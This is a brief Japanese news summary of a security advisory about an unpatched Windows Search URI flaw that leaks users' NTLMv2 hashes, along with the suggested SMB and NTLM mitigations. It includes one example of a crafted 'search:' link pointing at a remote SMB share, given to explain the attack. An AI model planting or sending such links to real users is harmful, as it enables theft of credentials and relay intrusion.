未パッチのWindows Search URIの脆弱性、NTLMv2ハッシュ盗聴が可能

概要

セキュリティ研究者が、Windows Searchの「search:」URIハンドラに存在する未修正の脆弱性を公開しました。攻撃者は特別に細工されたリンク（例：search:query=test&crumb=location:\\10.0.1.100\share）をメールやWebサイトに埋め込み、ユーザーをクリックさせることで、ユーザーのNTLMv2ハッシュ（Windows認証情報の一種）を盗聴できます。これは2026年4月15日に責任ある情報開示が行われましたが、Microsoftは「Critical以上の重大度のみ修正対象」という理由で修正を拒否しました。盗聴されたハッシュは、リレー攻撃に利用されてネットワーク内へのより深い侵入が可能になります。対策としては、不要なSMB通信の遮断、SMB署名の強制、NTLMの無効化が推奨されています。

元記事（The Hacker News）